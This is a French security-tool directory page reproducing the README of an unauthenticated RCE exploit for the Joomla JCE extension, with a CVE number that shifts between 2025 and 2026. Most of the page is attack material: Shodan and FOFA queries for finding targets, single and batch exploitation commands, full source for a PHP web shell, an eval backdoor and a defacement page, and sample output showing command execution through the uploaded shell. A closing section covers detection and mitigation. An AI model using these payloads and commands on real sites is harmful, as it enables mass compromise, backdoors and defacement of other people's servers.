Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-48907 — CVE-2025-48907 - Exploit RCE sans authentification pour Joomla JCE < 2.9.99.5 | Kitploit
Outils/GitHubGitHub/0xgh057r3c0n/cve-2026-48907
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHub0xgh057r3c0n/cve-2026-48907

CVE-2026-48907

CVE-2025-48907 - Exploit RCE sans authentification pour Joomla JCE < 2.9.99.5

Voir le dépôt
41il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Logo Joomla

CVE-2026-48907 - Joomla! JCE RCE non authentifiée

Extension JCE Joomla! < 2.9.99.5 - Téléchargement arbitraire de fichier PHP non authentifié et exécution de code à distance

License: MIT Python 3.6+ Security Shodan FOFA


🔎 Requêtes de moteur de recherche

Shodan

root@kitploit:~
http.component:"Joomla"

FOFA

root@kitploit:~
app="Joomla"

📋 Aperçu

Ce dépôt contient une preuve de concept (PoC) pour CVE-2026-48907, une vulnérabilité critique dans l'extension JCE (Joomla Content Editor) de Joomla! pour les versions antérieures à 2.9.99.5. La vulnérabilité permet à des attaquants non authentifiés de télécharger des fichiers PHP arbitraires via la fonctionnalité d'importation de profil JCE, conduisant à une exécution de code à distance (RCE).

⚠️ Avertissement

Cet outil est uniquement destiné à des fins éducatives et de test autorisé.

  • Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test
  • L'auteur n'est pas responsable de toute utilisation abusive ou illégale
  • Obtenez toujours une autorisation appropriée avant de tester

🔍 Détails de la vulnérabilité

Comment ça fonctionne

  1. Extraction du jeton CSRF: L'exploit extrait d'abord le jeton CSRF de la page d'accueil de la cible
  2. Abus de l'importation de profil: Il exploite la fonctionnalité d'importation de profil JCE (index.php?option=com_jce&task=profiles.import)
  3. Téléchargement de fichier PHP: Télécharge un fichier PHP malveillant déguisé en fichier XML de profil
  4. Exécution de code: Le fichier PHP téléchargé est placé dans le répertoire /tmp/ et peut être exécuté par accès direct

🚀 Fonctionnalités

  • ✅ Télécharger n'importe quel fichier PHP: Télécharger des shells PHP personnalisés, des backdoors ou des pages de défacement (basés sur PHP)
  • ✅ Traitement par lots: Scanner et exploiter plusieurs cibles à partir d'un fichier
  • ✅ Détection automatique du jeton CSRF: Extrait automatiquement les jetons CSRF
  • ✅ Mode verbeux: Sortie détaillée pour le débogage
  • ✅ Exportation des résultats: Enregistrer les URL de téléchargement réussies dans un fichier

📦 Installation

root@kitploit:~
# Clone the repository
git clone https://github.com/0xgh057r3c0n/CVE-2025-48907.git
cd CVE-2025-48907

# Install required dependencies
pip3 install requests urllib3

Prérequis

  • Python 3.6 ou supérieur
  • Bibliothèque requests
  • Bibliothèque urllib3

🎯 Utilisation

Syntaxe de base

root@kitploit:~
python3 CVE-2025-48907.py -u <TARGET_URL> -F <PHP_FILE_TO_UPLOAD>

Exemples

Télécharger un shell Web PHP

root@kitploit:~
python3 CVE-2025-48907.py -u http://target-joomla.com -F shell.php

Télécharger une page de défacement PHP

root@kitploit:~
python3 CVE-2025-48907.py -u http://target-joomla.com -F deface.php

Télécharger une backdoor PHP

root@kitploit:~
python3 CVE-2025-48907.py -u http://target-joomla.com -F backdoor.php

Exploitation par lots avec un fichier de cibles

root@kitploit:~
python3 CVE-2025-48907.py -f targets.txt -F payload.php

Avec sortie verbeuse et enregistrement des résultats

root@kitploit:~
python3 CVE-2025-48907.py -u http://target-joomla.com -F shell.php -v -o results.txt

Arguments de la ligne de commande

* Soit -u, soit -f doit être fourni

Format du fichier de cibles

Créez un fichier targets.txt avec une URL par ligne :

root@kitploit:~
http://joomla-site1.com
https://joomla-site2.com
http://192.168.1.100/joomla
# Comments are ignored
https://example-joomla.com

🔧 Création de charges utiles PHP

Toutes les charges utiles doivent être des fichiers PHP car l'exploit télécharge du code PHP qui sera exécuté sur le serveur.

Shell Web PHP

Créez shell.php:

root@kitploit:~
<?php
// Simple PHP Web Shell
if(isset($_GET['cmd'])){
    echo "<pre>";
    system($_GET['cmd']);
    echo "</pre>";
} else {
    echo "Usage: ?cmd=command";
}
?>

Page de défacement PHP

Créez deface.php:

root@kitploit:~
<?php
// PHP Deface Page
echo '<!DOCTYPE html>
<html>
<head>
    <title>Hacked by 0xgh057r3c0n</title>
    <style>
        body {
            background: #000;
            color: #0f0;
            font-family: "Courier New", monospace;
            text-align: center;
            padding: 50px;
        }
        h1 { font-size: 4em; text-shadow: 0 0 20px #0f0; }
        .ascii-art { white-space: pre; font-size: 12px; }
    </style>
</head>
<body>
    <h1>HACKED BY 0xgh057r3c0n</h1>
    <div class="ascii-art">
    ██╗  ██╗ █████╗  ██████╗██╗  ██╗███████╗██████╗ 
    ██║  ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗
    ███████║███████║██║     █████╔╝ █████╗  ██║  ██║
    ██╔══██║██╔══██║██║     ██╔═██╗ ██╔══╝  ██║  ██║
    ██║  ██║██║  ██║╚██████╗██║  ██╗███████╗██████╔╝
    ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚══════╝╚═════╝ 
    </div>
    <p>Security is not a product, it\'s a process.</p>
    <p>Server: <?php echo $_SERVER["SERVER_SOFTWARE"]; ?></p>
    <p>Time: <?php echo date("Y-m-d H:i:s"); ?></p>
</body>
</html>';
?>

Backdoor PHP (Minimaliste)

Créez backdoor.php:

root@kitploit:~
<?php
// Minimal PHP Backdoor
if(isset($_REQUEST['c'])) { eval($_REQUEST['c']); }
?>

📊 Exemple de sortie

root@kitploit:~
_____________   _______________         _______________   ________  ________            _____   ______  ________________________ 
\_   ___ \   \ /   /\_   _____/         \_____  \   _  \  \_____  \/  _____/           /  |  | /  __  \/   __   \   _  \______  \
/    \  \/\   Y   /  |    __)_   ______  /  ____/  /_\  \  /  ____/   __  \   ______  /   |  |_>      <\____    /  /_\  \  /    /
\     \____\     /   |        \ /_____/ /       \  \_/   \/       \  |__\  \ /_____/ /    ^   /   --   \  /    /\  \_/   \/    / 
 \______  / \___/   /_______  /         \_______ \_____  /\_______ \_____  /         \____   |\______  / /____/  \_____  /____/  
        \/                  \/                  \/     \/         \/     \/               |__|       \/                \/

Joomla! JCE extension < 2.9.99.5 Unauthenticated RCE
Author : 0xgh057r3c0n (PHP File Upload)

[*] Loaded 3 target(s)

[*] Target 1/3
[*] ==================================================
[+] Target: http://target-joomla.com
[+] Fetching CSRF token...
[+] CSRF Token: a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6
[+] Uploading PHP file: cve-2026-48907-1234.xml.php
[+] Profile imported successfully!
[+] Testing uploaded PHP file...

============================================================
[!!!!!] PHP FILE UPLOADED SUCCESSFULLY!
[!!!!!] Server IS VULNERABLE to CVE-2025-48907!
============================================================

[+] View your uploaded PHP file: http://target-joomla.com/tmp/cve-2026-48907-1234.xml.php
[+] Quick access:
    curl "http://target-joomla.com/tmp/cve-2026-48907-1234.xml.php?cmd=id"

🛡️ Détection et atténuation

Comment détecter

  • Vérifier la présence de fichiers PHP suspects dans le répertoire /tmp/
  • Surveiller l'activité d'importation de profil JCE dans les journaux
  • Rechercher des requêtes inattendues vers index.php?option=com_jce&task=profiles.import
  • Vérifier les fichiers avec l'extension .xml.php dans /tmp/
  • Surveiller les exécutions PHP inhabituelles depuis le répertoire /tmp/

Étapes d'atténuation

  1. Mettre à jour l'extension JCE :

    • Mettre à niveau vers la version 2.9.99.5 ou supérieure
    • Télécharger depuis : Site officiel JCE
  2. Solutions de contournement temporaires :

    • Désactiver l'extension JCE si non nécessaire
    • Implémenter des règles de pare-feu d'application Web (WAF)
    • Restreindre l'exécution PHP dans le répertoire /tmp/
    • Désactiver allow_url_fopen si non requis
  3. Actions post-compromission :

    • Supprimer les fichiers PHP téléchargés de /tmp/
    • Auditer le système pour les backdoors
    • Réinitialiser tous les identifiants (admin Joomla, FTP, hébergement)
    • Examiner les journaux système pour les accès non autorisés
    • Vérifier la présence d'autres fichiers compromis

📝 Licence

Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.

License: MIT


🤝 Contribution

Les contributions sont les bienvenues ! N'hésitez pas à soumettre une Pull Request.

  1. Forkez le dépôt
  2. Créez votre branche de fonctionnalité (git checkout -b feature/AmazingFeature)
  3. Commitez vos modifications (git commit -m 'Add some AmazingFeature')
  4. Poussez vers la branche (git push origin feature/AmazingFeature)
  5. Ouvrez une Pull Request

⭐ Historique des étoiles

Si vous trouvez cet outil utile, pensez à lui donner une étoile ⭐ sur GitHub !


📞 Contact et support

  • Auteur : 0xgh057r3c0n
  • GitHub : https://github.com/0xgh057r3c0n/CVE-2025-48907
  • Problèmes : Signaler un bug

🔗 Références

  • NVD - CVE-2025-48907
  • Site officiel JCE
  • Centre de sécurité Joomla!

Construit avec ❤️ par 0xgh057r3c0n
Télécharger l’outil
PropriétéValeur
CVE IDCVE-2026-48907
ProduitExtension JCE Joomla!
Versions affectées< 2.9.99.5
Type de vulnérabilitéTéléchargement de fichier PHP non authentifié → RCE
Score CVSS9.8 (Critique)
Vecteur d'attaqueRéseau
AuthentificationAucune requise
ImpactCompromission complète du système
ArgumentRequisDescription
-u, --urlOui*URL cible unique (ex. http://target.com)
-f, --fileOui*Fichier contenant la liste des URL cibles (une par ligne)
-F, --upload-fileOuiFichier PHP à télécharger (shell, backdoor, page de défacement)
-v, --verboseNonActiver la sortie verbeuse pour le débogage
-o, --outputNonEnregistrer les URL de téléchargement réussies dans un fichier